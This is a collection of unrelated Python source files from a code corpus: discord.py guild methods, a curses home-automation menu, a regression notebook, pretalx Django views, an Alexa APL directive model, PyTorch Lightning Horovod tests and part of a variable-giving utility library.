after: Union[:class:`abc.Snowflake`, :class:`datetime.datetime`]
Retrieve entries after this date or entry.
If a datetime is provided, it is recommended to use a UTC aware datetime.
If the datetime is naive, it is assumed to be local time.
oldest_first: :class:`bool`
If set to ``True``, return entries in oldest->newest order. Defaults to ``True`` if
``after`` is specified, otherwise ``False``.
user: :class:`abc.Snowflake`
The moderator to filter entries from.
action: :class:`AuditLogAction`
The action to filter with.
Raises
-------
Forbidden
You are not allowed to fetch audit logs
HTTPException
An error occurred while fetching the audit logs.
Yields
--------
:class:`AuditLogEntry`
The audit log entry.
"""
if user:
user = user.id
if action:
action = action.value
return AuditLogIterator(self, before=before, after=after, limit=limit,
oldest_first=oldest_first, user_id=user, action_type=action)
async def widget(self):
"""|coro|
Returns the widget of the guild.
.. note::
The guild must have the widget enabled to get this information.
Raises
-------
Forbidden
The widget for this guild is disabled.
HTTPException
Retrieving the widget failed.
Returns
--------
:class:`Widget`
The guild's widget.
"""
data = await self._state.http.get_widget(self.id)
return Widget(state=self._state, data=data)
async def chunk(self, *, cache=True):
"""|coro|
Requests all members that belong to this guild. In order to use this,
:meth:`Intents.members` must be enabled.
This is a websocket operation and can be slow.
.. versionadded:: 1.5
Parameters
-----------
cache: :class:`bool`
Whether to cache the members as well.
Raises
-------
ClientException
The members intent is not enabled.
"""
if not self._state._intents.members:
raise ClientException('Intents.members must be enabled to use this.')
return await self._state.chunk_guild(self, cache=cache)
async def query_members(self, query=None, *, limit=5, user_ids=None, presences=False, cache=True):
"""|coro|
Request members that belong to this guild whose username starts with
the query given.
This is a websocket operation and can be slow.
.. versionadded:: 1.3
Parameters
-----------
query: Optional[:class:`str`]
The string that the username's start with.
limit: :class:`int`
The maximum number of members to send back. This must be
a number between 5 and 100.
presences: :class:`bool`
Whether to request for presences to be provided. This defaults
to ``False``.
.. versionadded:: 1.6
cache: :class:`bool`
Whether to cache the members internally. This makes operations
such as :meth:`get_member` work for those that matched.
user_ids: Optional[List[:class:`int`]]
List of user IDs to search for. If the user ID is not in the guild then it won't be returned.
.. versionadded:: 1.4
Raises
-------
asyncio.TimeoutError
The query timed out waiting for the members.
ValueError
Invalid parameters were passed to the function
ClientException
The presences intent is not enabled.
Returns
--------
List[:class:`Member`]
The list of members that have matched the query.
"""
if presences and not self._state._intents.presences:
raise ClientException('Intents.presences must be enabled to use this.')
if query is None:
if query == '':
raise ValueError('Cannot pass empty query string.')
if user_ids is None:
raise ValueError('Must pass either query or user_ids')
if user_ids is not None and query is not None:
raise ValueError('Cannot pass both query and user_ids')
if user_ids is not None and not user_ids:
raise ValueError('user_ids must contain at least 1 value')
limit = min(100, limit or 5)
return await self._state.query_members(self, query=query, limit=limit, user_ids=user_ids, presences=presences, cache=cache)
async def change_voice_state(self, *, channel, self_mute=False, self_deaf=False):
"""|coro|
Changes client's voice state in the guild.
.. versionadded:: 1.4
Parameters
-----------
channel: Optional[:class:`VoiceChannel`]
Channel the client wants to join. Use ``None`` to disconnect.
self_mute: :class:`bool`
Indicates if the client should be self-muted.
self_deaf: :class:`bool`
Indicates if the client should be self-deafened.
"""
ws = self._state._get_websocket(self.id)
channel_id = channel.id if channel else None
await ws.voice_state(self.id, channel_id, self_mute, self_deaf)
|
the-stack_0_3748 | #!/usr/bin/env python3
from sensor import sensor
from room_devices import room_devices
from mqtt import mqtt
# from instance import room_devices
from threading import Thread
import curses
import time
def salutation(screen):
screen.addstr(0, 0, "digite 0 para sair do programa")
screen.addstr(1, 0, "digite 1 para adicionar um novo dispositivo")
screen.addstr(2, 0, "digite 2 para setar o estado de um dispositivo")
screen.addstr(3, 0, "digite 3 para parar o alarme")
def input_str(screen, y_pos : int, lenght : int, instructions = "") -> str:
screen.clear()
screen.nodelay(False)
curses.echo()
screen.addstr(y_pos - 1, 0, instructions)
screen.refresh()
string = screen.getstr(y_pos, 0, lenght)
curses.noecho()
screen.nodelay(True)
return string.decode("utf-8")
# mqtt = Mqtt()
if __name__ == "__main__":
try:
polling = room_devices.run_polling()
screen = curses.initscr()
curses.noecho()
screen.nodelay(True)
flag = -1
y_pos = 4
while flag != ord("0"):
screen.clear()
salutation(screen)
room_devices.print_device(screen)
temp, hum = sensor()
screen.addstr(4, 0, f"cômodo central. Humidade: {hum} Temperatura {temp}")
if(flag == ord("1")):
room = input_str(screen,2,50,"digite o nome do cômodo")
input_device = input_str(screen,2,50,"digite o nome do dispositivo de entrada")
output_device = input_str(screen,2,50,"digite o nome do dispositivo de saída")
room_devices.esp_defined_device.update({
room : {
"in": input_device,
"out": output_device
}
})
flag_device = input_str(screen,2,1,"digite 1 para definir o dispositivo ou 0 para usar o padrão")
y_pos += 1
if(int(flag_device)):
matricula = input_str(screen,2,50,"digite a matricula")
mac = input_str(screen,2,50,"digite o endereço mac")
thread = Thread(target=mqtt,args = (screen,room,y_pos,matricula,mac), daemon=True)
thread.start()
else:
thread = Thread(target=mqtt,daemon=True,args = (screen,room,y_pos))
thread.start()
elif (flag == ord("2")):
room_name = input_str(screen, 2, 50, "digite o nome do cômodo")
state = bool(
int(
input_str(
screen,
2,
1,
"digite seu estado(1 ou 0)")))
room_devices.device_set(room_name, state)
elif (flag == ord("3")):
screen.clear()
try:
room_devices.alarm_handle.terminate()
screen.addstr(6, 0, "alarme desligado")
except AttributeError:
screen.addstr(6, 0, "alarme não foi inicializado")
flag = screen.getch()
time.sleep(1)
except Exception as err:
curses.endwin()
try:
# dealocating memory
room_devices.alarm_handle.close()
except:
pass
# it's easier to debug raising the error
raise err
curses.endwin()
try:
# dealocating memory
room_devices.alarm_handle.close()
except:
pass
|
the-stack_0_3752 | # Predicting Customer Lifetime Value
## Loading and Viewing Data
from pandas import Series, DataFrame
import pandas as pd
import numpy as np
import os
import matplotlib.pylab as plt
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
import sklearn.metrics
raw_data = pd.read_csv("history.csv")
raw_data.dtypes
print(raw_data.head(5))
## Do Correlation Analysis
cleaned_data = raw_data.drop("CUST_ID",axis=1)
cleaned_data .corr()['CLV']
## Do Training and Testing Split
# Let us split the data into training and testing datasets in the ratio 90:10.
predictors = cleaned_data.drop("CLV",axis=1)
targets = cleaned_data.CLV
pred_train, pred_test, tar_train, tar_test = train_test_split(predictors, targets, test_size=.1)
print( "Predictor - Training : ", pred_train.shape, "Predictor - Testing : ", pred_test.shape )
## Build and Test Model
# Build model on training data
model = LinearRegression()
model.fit(pred_train,tar_train)
print("Coefficients: \n", model.coef_)
print("Intercept:", model.intercept_)
# Test on testing data
predictions = model.predict(pred_test)
predictions
sklearn.metrics.r2_score(tar_test, predictions)
## Predicting for a new Customer
new_data = np.array([100,0,50,0,0,0]).reshape(1, -1)
new_pred=model.predict(new_data)
print("The CLV for the new customer is : $",new_pred[0]) |
the-stack_0_3754 | from contextlib import suppress
from urllib.parse import urlparse
import vobject
from django.conf import settings
from django.contrib import messages
from django.db.models import Q
from django.http import Http404, HttpResponse
from django.shortcuts import render
from django.utils.functional import cached_property
from django.utils.translation import ugettext_lazy as _
from django.views.generic import DetailView, FormView, ListView
from pretalx.agenda.signals import register_recording_provider
from pretalx.cfp.views.event import EventPageMixin
from pretalx.common.mixins.views import (
EventPermissionRequired, Filterable, PermissionRequired,
)
from pretalx.common.phrases import phrases
from pretalx.person.models.profile import SpeakerProfile
from pretalx.schedule.models import Schedule, TalkSlot
from pretalx.submission.forms import FeedbackForm
from pretalx.submission.models import Feedback, QuestionTarget, Submission
class TalkList(EventPermissionRequired, Filterable, ListView):
context_object_name = 'talks'
model = Submission
template_name = 'agenda/talks.html'
permission_required = 'agenda.view_schedule'
default_filters = ('speakers__name__icontains', 'title__icontains')
def get_queryset(self):
return self.filter_queryset(self.request.event.talks).distinct()
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['search'] = self.request.GET.get('q')
return context
class SpeakerList(EventPermissionRequired, Filterable, ListView):
context_object_name = 'speakers'
template_name = 'agenda/speakers.html'
permission_required = 'agenda.view_schedule'
default_filters = ('user__name__icontains',)
def get_queryset(self):
qs = SpeakerProfile.objects.filter(
user__in=self.request.event.speakers, event=self.request.event
).select_related('user', 'event')
return self.filter_queryset(qs)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['search'] = self.request.GET.get('q')
return context
class TalkView(PermissionRequired, DetailView):
context_object_name = 'submission'
model = Submission
slug_field = 'code'
template_name = 'agenda/talk.html'
permission_required = 'agenda.view_slot'
def get_object(self, queryset=None):
with suppress(AttributeError, Submission.DoesNotExist):
return self.request.event.talks.get(
code__iexact=self.kwargs['slug'],
)
if getattr(self.request, 'is_orga', False):
talk = self.request.event.wip_schedule.talks.filter(
submission__code__iexact=self.kwargs['slug'], is_visible=True
).first()
if talk:
return talk.submission
raise Http404()
@cached_property
def recording(self):
for receiver, response in register_recording_provider.send_robust(
self.request.event
):
if (
response
and not isinstance(response, Exception)
and hasattr(response, 'get_recording')
):
recording = response.get_recording(self.object)
if recording and recording['iframe']:
return recording
else:
print(response)
if self.object.rendered_recording_iframe:
return {
'iframe': self.object.rendered_recording_iframe,
'csp_header': 'https://media.ccc.de',
}
return {}
def get(self, request, *args, **kwargs):
response = super().get(request, *args, **kwargs)
if self.recording.get('csp_header'):
response._csp_update = {'child-src': self.recording.get('csp_header')}
return response
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
qs = TalkSlot.objects.none()
schedule = Schedule.objects.none()
submission = self.object
if self.request.event.current_schedule:
schedule = self.request.event.current_schedule
qs = schedule.talks.filter(is_visible=True)
elif self.request.is_orga:
schedule = self.request.event.wip_schedule
qs = schedule.talks.all()
context['talk_slots'] = qs.filter(submission=submission).order_by('start')
context['submission_description'] = (
submission.description
or submission.abstract
or _('The talk »{title}« at {event}').format(
title=submission.title, event=submission.event.name
)
)
context['recording_iframe'] = self.recording.get('iframe')
context['answers'] = submission.answers.filter(
question__is_public=True,
question__event=self.request.event,
question__target=QuestionTarget.SUBMISSION,
)
context['speakers'] = []
other_submissions = schedule.slots.exclude(pk=submission.pk)
for speaker in submission.speakers.all():
speaker.talk_profile = speaker.event_profile(event=self.request.event)
speaker.other_submissions = other_submissions.filter(speakers__in=[speaker])
context['speakers'].append(speaker)
return context
class TalkReviewView(DetailView):
model = Submission
slug_field = 'review_code'
template_name = 'agenda/talk.html'
class SingleICalView(EventPageMixin, DetailView):
model = Submission
slug_field = 'code'
def get(self, request, event, **kwargs):
talk = (
self.get_object()
.slots.filter(schedule=self.request.event.current_schedule, is_visible=True)
.first()
)
if not talk:
raise Http404()
netloc = urlparse(settings.SITE_URL).netloc
cal = vobject.iCalendar()
cal.add('prodid').value = '-//pretalx//{}//{}'.format(
netloc, talk.submission.code
)
talk.build_ical(cal)
code = talk.submission.code
resp = HttpResponse(cal.serialize(), content_type='text/calendar')
resp[
'Content-Disposition'
] = f'attachment; filename="{request.event.slug}-{code}.ics"'
return resp
class FeedbackView(PermissionRequired, FormView):
model = Feedback
form_class = FeedbackForm
template_name = 'agenda/feedback_form.html'
permission_required = 'agenda.give_feedback'
def get_object(self):
return Submission.objects.filter(
event=self.request.event,
code__iexact=self.kwargs['slug'],
slots__in=self.request.event.current_schedule.talks.filter(is_visible=True),
).first()
def get(self, *args, **kwargs):
talk = self.get_object()
if talk and self.request.user in talk.speakers.all():
return render(
self.request,
'agenda/feedback.html',
context={
'talk': talk,
'feedback': talk.feedback.filter(
Q(speaker__isnull=True) | Q(speaker=self.request.user)
),
},
)
return super().get(*args, **kwargs)
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs['talk'] = self.get_object()
return kwargs
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['talk'] = self.get_object()
return context
def form_valid(self, form):
result = super().form_valid(form)
form.save()
messages.success(self.request, phrases.agenda.feedback_success)
return result
def get_success_url(self):
return self.get_object().urls.public
|
the-stack_0_3755 | # coding: utf-8
#
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file
# except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
#
import pprint
import re # noqa: F401
import six
import typing
from enum import Enum
from ask_sdk_model.directive import Directive
if typing.TYPE_CHECKING:
from typing import Dict, List, Optional
from datetime import datetime
class RenderDocumentDirective(Directive):
"""
:param token: A unique identifier for the presentation.
:type token: (optional) str
:param document: The APL document that the devices need to render a presentation.
:type document: (optional) dict(str, object)
:param datasources: Data sources to bind to the document when rendering.
:type datasources: (optional) dict(str, object)
:param packages: A list of packages including layouts, styles, and images etc.
:type packages: (optional) list[object]
"""
deserialized_types = {
'object_type': 'str',
'token': 'str',
'document': 'dict(str, object)',
'datasources': 'dict(str, object)',
'packages': 'list[object]'
}
attribute_map = {
'object_type': 'type',
'token': 'token',
'document': 'document',
'datasources': 'datasources',
'packages': 'packages'
}
def __init__(self, token=None, document=None, datasources=None, packages=None):
# type: (Optional[str], Optional[Dict[str, object]], Optional[Dict[str, object]], Optional[List[object]]) -> None
"""
:param token: A unique identifier for the presentation.
:type token: (optional) str
:param document: The APL document that the devices need to render a presentation.
:type document: (optional) dict(str, object)
:param datasources: Data sources to bind to the document when rendering.
:type datasources: (optional) dict(str, object)
:param packages: A list of packages including layouts, styles, and images etc.
:type packages: (optional) list[object]
"""
self.__discriminator_value = "Alexa.Presentation.APL.RenderDocument"
self.object_type = self.__discriminator_value
super(RenderDocumentDirective, self).__init__(object_type=self.__discriminator_value)
self.token = token
self.document = document
self.datasources = datasources
self.packages = packages
def to_dict(self):
# type: () -> Dict[str, object]
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.deserialized_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else
x.value if isinstance(x, Enum) else x,
value
))
elif isinstance(value, Enum):
result[attr] = value.value
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else
(item[0], item[1].value)
if isinstance(item[1], Enum) else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
# type: () -> str
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
# type: () -> str
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
# type: (object) -> bool
"""Returns true if both objects are equal"""
if not isinstance(other, RenderDocumentDirective):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
# type: (object) -> bool
"""Returns true if both objects are not equal"""
return not self == other
|
the-stack_0_3757 | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import platform
import shlex
import subprocess
import sys
import numpy as np
import pytest
import torch
from sklearn.metrics import accuracy_score
import tests.base.develop_pipelines as tpipes
import tests.base.develop_utils as tutils
from pytorch_lightning import Trainer
from pytorch_lightning.accelerators.horovod_accelerator import HorovodAccelerator
from pytorch_lightning.core.step_result import EvalResult, Result, TrainResult
from pytorch_lightning.metrics.classification.accuracy import Accuracy
from pytorch_lightning.utilities import APEX_AVAILABLE, NATIVE_AMP_AVAILABLE, HOROVOD_AVAILABLE, _module_available
from tests.base import EvalModelTemplate
from tests.base.boring_model import BoringModel
from tests.base.models import BasicGAN
if HOROVOD_AVAILABLE:
import horovod
import horovod.torch as hvd
# This script will run the actual test model training in parallel
TEST_SCRIPT = os.path.join(os.path.dirname(__file__), 'data', 'horovod', 'train_default_model.py')
try:
from horovod.common.util import nccl_built
nccl_built()
except (ImportError, ModuleNotFoundError, AttributeError):
HOROVOD_NCCL_AVAILABLE = False
finally:
HOROVOD_NCCL_AVAILABLE = True
def _run_horovod(trainer_options, on_gpu=False):
"""Execute the training script across multiple workers in parallel."""
num_processes = trainer_options.get('gpus', 2)
# for Horovod, we interpret `gpus` to be set per worker
trainer_options.update(gpus=1 if on_gpu else None)
tutils.reset_seed()
cmdline = [
'horovodrun',
'-np', str(num_processes),
sys.executable, TEST_SCRIPT,
'--trainer-options', shlex.quote(json.dumps(trainer_options))
]
if on_gpu:
cmdline += ['--on-gpu']
exit_code = subprocess.call(' '.join(cmdline), shell=True, env=os.environ.copy())
assert exit_code == 0
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.parametrize("enable_pl_optimizer", [False, True])
def test_horovod_cpu(enable_pl_optimizer, tmpdir):
"""Test Horovod running multi-process on CPU."""
trainer_options = dict(
default_root_dir=str(tmpdir),
weights_save_path=str(tmpdir),
gradient_clip_val=1.0,
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
distributed_backend='horovod',
deterministic=True,
enable_pl_optimizer=enable_pl_optimizer,
)
_run_horovod(trainer_options)
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.parametrize("enable_pl_optimizer", [False, True])
def test_horovod_cpu_implicit(enable_pl_optimizer, tmpdir):
"""Test Horovod without specifying a backend, inferring from env set by `horovodrun`."""
trainer_options = dict(
default_root_dir=str(tmpdir),
weights_save_path=str(tmpdir),
gradient_clip_val=1.0,
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
deterministic=True,
enable_pl_optimizer=enable_pl_optimizer,
)
_run_horovod(trainer_options)
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.skipif(not HOROVOD_NCCL_AVAILABLE, reason="test requires Horovod with NCCL support")
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
def test_horovod_multi_gpu(tmpdir):
"""Test Horovod with multi-GPU support."""
trainer_options = dict(
default_root_dir=str(tmpdir),
weights_save_path=str(tmpdir),
gradient_clip_val=1.0,
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
gpus=2,
deterministic=True,
distributed_backend='horovod'
)
_run_horovod(trainer_options, on_gpu=True)
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.skipif(not HOROVOD_NCCL_AVAILABLE, reason="test requires Horovod with NCCL support")
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
@pytest.mark.skipif(not APEX_AVAILABLE, reason="test requires apex")
def test_horovod_apex(tmpdir):
"""Test Horovod with multi-GPU support using apex amp."""
trainer_options = dict(
default_root_dir=str(tmpdir),
weights_save_path=str(tmpdir),
gradient_clip_val=1.0,
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
gpus=2,
deterministic=True,
distributed_backend='horovod',
amp_backend='apex',
precision=16,
)
_run_horovod(trainer_options, on_gpu=True)
@pytest.mark.skip(reason="Skip till Horovod fixes integration with Native torch.cuda.amp")
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.skipif(not HOROVOD_NCCL_AVAILABLE, reason="test requires Horovod with NCCL support")
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
@pytest.mark.skipif(not NATIVE_AMP_AVAILABLE, reason="test requires torch.cuda.amp")
def test_horovod_amp(tmpdir):
"""Test Horovod with multi-GPU support using native amp."""
trainer_options = dict(
default_root_dir=str(tmpdir),
weights_save_path=str(tmpdir),
gradient_clip_val=1.0,
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
gpus=2,
deterministic=True,
distributed_backend='horovod',
amp_backend='native',
precision=16,
)
_run_horovod(trainer_options, on_gpu=True)
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.skipif(not HOROVOD_NCCL_AVAILABLE, reason="test requires Horovod with NCCL support")
@pytest.mark.skipif(not torch.cuda.is_available(), reason="test requires GPU machine")
def test_horovod_transfer_batch_to_gpu(tmpdir):
class TestTrainingStepModel(EvalModelTemplate):
def training_step(self, batch, *args, **kwargs):
x, y = batch
assert str(x.device) != 'cpu'
assert str(y.device) != 'cpu'
return super(TestTrainingStepModel, self).training_step(batch, *args, **kwargs)
def validation_step(self, batch, *args, **kwargs):
x, y = batch
assert str(x.device) != 'cpu'
assert str(y.device) != 'cpu'
return super(TestTrainingStepModel, self).validation_step(batch, *args, **kwargs)
hparams = EvalModelTemplate.get_default_hparams()
model = TestTrainingStepModel(**hparams)
trainer_options = dict(
default_root_dir=str(tmpdir),
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
gpus=1,
deterministic=True,
distributed_backend='horovod'
)
tpipes.run_model_test_without_loggers(trainer_options, model)
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.parametrize("enable_pl_optimizer", [False, True])
def test_horovod_multi_optimizer(enable_pl_optimizer, tmpdir):
model = BasicGAN(**EvalModelTemplate.get_default_hparams())
# fit model
trainer = Trainer(
default_root_dir=str(tmpdir),
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
deterministic=True,
distributed_backend='horovod',
enable_pl_optimizer=enable_pl_optimizer,
)
result = trainer.fit(model)
assert result == 1, 'model failed to complete'
assert len(trainer.optimizers) == 2
for i, optimizer in enumerate(trainer.optimizers):
assert hasattr(optimizer, 'synchronize'), 'optimizer has not been wrapped into DistributedOptimizer'
def get_model_params(model):
return set([p for p in model.parameters()])
def get_optimizer_params(optimizer):
return set([p for group in optimizer.param_groups for p in group.get('params', [])])
assert get_model_params(model.generator) != get_model_params(model.discriminator)
assert get_model_params(model.generator) == get_optimizer_params(trainer.optimizers[0])
assert get_model_params(model.discriminator) == get_optimizer_params(trainer.optimizers[1])
@pytest.mark.skipif(not HOROVOD_AVAILABLE, reason="Horovod is unavailable")
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.parametrize("enable_pl_optimizer", [False, True])
def test_result_reduce_horovod(enable_pl_optimizer, tmpdir):
"""Make sure result logging works with Horovod.
This test mirrors tests/core/test_results.py::_ddp_test_fn
"""
tutils.reset_seed()
tutils.set_random_master_port()
def hvd_test_fn():
path_here = os.path.abspath(os.path.dirname(__file__))
path_root = os.path.abspath(os.path.join(path_here, '..', '..'))
sys.path.insert(0, os.path.abspath(path_root))
class TestModel(BoringModel):
def training_step(self, batch, batch_idx):
self.training_step_called = True
tensor = torch.tensor([1.0])
self.log("test_tensor", tensor, sync_dist=True, sync_dist_op='sum',
on_step=True, on_epoch=True)
res = self._results
# Check that `tensor` is summed across all ranks automatically
assert res["test_tensor"].item() == hvd.size(), \
"Result-Log does not work properly with Horovod and Tensors"
def training_epoch_end(self, outputs) -> None:
assert len(outputs) == 0
model = TestModel()
model.val_dataloader = None
trainer = Trainer(
default_root_dir=tmpdir,
limit_train_batches=2,
limit_val_batches=2,
max_epochs=1,
log_every_n_steps=1,
weights_summary=None,
enable_pl_optimizer=enable_pl_optimizer,
)
trainer.fit(model)
horovod.run(hvd_test_fn, np=2)
@pytest.mark.skipif(not HOROVOD_AVAILABLE, reason="Horovod is unavailable")
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
def test_accuracy_metric_horovod():
num_batches = 10
batch_size = 16
threshold = 0.5
def sk_metric(preds, target):
sk_preds = (preds.view(-1).numpy() >= threshold).astype(np.uint8)
sk_target = target.view(-1).numpy()
return accuracy_score(y_true=sk_target, y_pred=sk_preds)
preds = torch.rand(num_batches, batch_size)
target = torch.randint(high=2, size=(num_batches, batch_size))
def _compute_batch():
trainer = Trainer(
fast_dev_run=True,
distributed_backend='horovod',
)
accelerator_backend = trainer.accelerator_connector.select_accelerator()
assert isinstance(accelerator_backend, HorovodAccelerator)
metric = Accuracy(compute_on_step=True,
dist_sync_on_step=True,
dist_sync_fn=accelerator_backend.gather_all_tensors,
threshold=threshold)
for i in range(hvd.rank(), num_batches, hvd.size()):
batch_result = metric(preds[i], target[i])
if hvd.rank() == 0:
dist_preds = torch.stack([preds[i + r] for r in range(hvd.size())])
dist_target = torch.stack([target[i + r] for r in range(hvd.size())])
sk_batch_result = sk_metric(dist_preds, dist_target)
assert np.allclose(batch_result.numpy(), sk_batch_result)
# check on all batches on all ranks
result = metric.compute()
assert isinstance(result, torch.Tensor)
total_preds = torch.stack([preds[i] for i in range(num_batches)])
total_target = torch.stack([target[i] for i in range(num_batches)])
sk_result = sk_metric(total_preds, total_target)
assert np.allclose(result.numpy(), sk_result)
horovod.run(_compute_batch, np=2)
# @pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
# def test_horovod_multi_optimizer_with_scheduling_stepping(tmpdir):
# hparams = EvalModelTemplate.get_default_hparams()
# model = EvalModelTemplate(**hparams)
# model.configure_optimizers = model.configure_optimizers__multiple_schedulers
#
# num_workers = 8
# init_lr = hparams.get('learning_rate') * num_workers
#
# with patch('pytorch_lightning.accelerators.horovod_backend.hvd.size') as mock_hvd_size:
# mock_hvd_size.return_value = 8
#
# # fit model
# trainer = Trainer(
# default_root_dir=tmpdir,
# max_epochs=1,
# limit_val_batches=0.5,
# limit_train_batches=0.2,
# distributed_backend='horovod'
# )
# results = trainer.fit(model)
# assert results == 1
#
# adjusted_lr1 = [pg['lr'] for pg in trainer.optimizers[0].param_groups][0]
# adjusted_lr2 = [pg['lr'] for pg in trainer.optimizers[1].param_groups][0]
#
# # Called ones after end of epoch with gamma=0.1
# assert pytest.approx(init_lr * 0.1) == adjusted_lr1
#
# # Called every 3 steps, meaning for 1 epoch of 11 batches, it is called 3 times with gamma=0.1
# assert pytest.approx(init_lr * 0.1) == adjusted_lr2
|
the-stack_0_3758 | import ast
import sys
import time
from collections import namedtuple
from contextlib import contextmanager
from contextvars import ContextVar
from itertools import count
from varname import ImproperUseError, VarnameRetrievingError, argname, varname
from varname.utils import get_node
global_context = ContextVar("global_context", default=())
global_inherited = ContextVar("global_inherited", default={})
_block_classes = {
ast.If: ("body", "orelse"),
ast.For: ("body", "orelse"),
ast.While: ("body", "orelse"),
ast.FunctionDef: ("body",),
ast.AsyncFunctionDef: ("body",),
ast.With: ("body",),
ast.AsyncWith: ("body",),
ast.AsyncFor: ("body", "orelse"),
}
_improper_nullary_give_error = (
"give() with no arguments must immediately follow an assignment"
)
special_keys = {}
global_count = count(0)
def register_special(key):
"""Return a decorator to register a function for a special key.
The function is called with no arguments whenever the special key is
requested, e.g. with ``Giver(special=["$specialkey"])``.
Use ``sys._getframe(3)`` to get the frame in which give() was called.
Example:
.. code-block:: python
@register_special("$time")
def _special_time():
return time.time()
Arguments:
key: The key, conventionally starting with a "$".
"""
def deco(func):
special_keys[key] = func
return func
return deco
@register_special("$time")
def _special_time():
return time.time()
@register_special("$frame")
def _special_frame():
return sys._getframe(3)
LinePosition = namedtuple("LinePosition", ["name", "filename", "lineno"])
@register_special("$line")
def _special_line():
fr = sys._getframe(3)
co = fr.f_code
return LinePosition(co.co_name, co.co_filename, fr.f_lineno)
def _find_targets(target):
if isinstance(target, ast.Tuple):
results = []
for t in target.elts:
results += _find_targets(t)
return results
else:
return [target.id]
def _find_above(frame):
node = get_node(frame + 1)
if node is None:
raise VarnameRetrievingError(
"Cannot retrieve the node where the function is called"
)
while node.parent is not None:
parent = node.parent
fields = _block_classes.get(type(parent), None)
if fields is None:
node = parent
continue
else:
for field in fields:
f = getattr(parent, field)
if node in f:
idx = f.index(node)
if idx == 0:
raise ImproperUseError(_improper_nullary_give_error)
assignment = f[idx - 1]
if isinstance(assignment, ast.Assign):
target = assignment.targets[-1]
names = _find_targets(target)
elif isinstance(assignment, (ast.AugAssign, ast.AnnAssign)):
names = [assignment.target.id]
else:
raise ImproperUseError(_improper_nullary_give_error)
fr = sys._getframe(frame)
rval = {}
for name in names:
if name in fr.f_locals:
rval[name] = fr.f_locals[name]
elif name in fr.f_globals:
rval[name] = fr.f_globals[name]
else: # pragma: no cover
# I am not sure how to trigger this
raise Exception("Could not resolve value")
return rval
else: # pragma: no cover
# I am not sure how to trigger this
raise Exception("Could not find node position")
# I am not sure how to trigger this
raise Exception("Could not find node") # pragma: no cover
def resolve(frame, func, args):
"""Return a {variable_name: value} dictionary depending on usage.
* ``len(args) == 0`` => Use the variable assigned in the line before the call.
* ``len(args) == 1`` => Use the variable the call is assigned to.
* ``len(args) >= 1`` => Use the variables passed as arguments to the call.
Arguments:
frame: The number of frames to go up to find the context.
func: The Giver object that was called.
args: The arguments given to the Giver.
"""
nargs = len(args)
if nargs == 0:
return _find_above(frame=frame + 2)
if nargs == 1:
try:
assigned_to = varname(frame=frame + 1, strict=True, raise_exc=False)
except ImproperUseError:
assigned_to = None
if assigned_to is not None:
return {assigned_to: args[0]}
argnames = argname("args", func=func, frame=frame + 1, vars_only=False)
if argnames is None: # pragma: no cover
# I am not sure how to trigger this
raise Exception("Could not resolve arg names")
return {name: value for name, value in zip(argnames, args)}
class Giver:
"""Giver of key/value pairs.
``Giver`` is the class of the ``give`` object.
Arguments:
keys:
List of default keys to give. If ``keys=["x"]``, then
``self(123)`` will give ``{"x": 123}``.
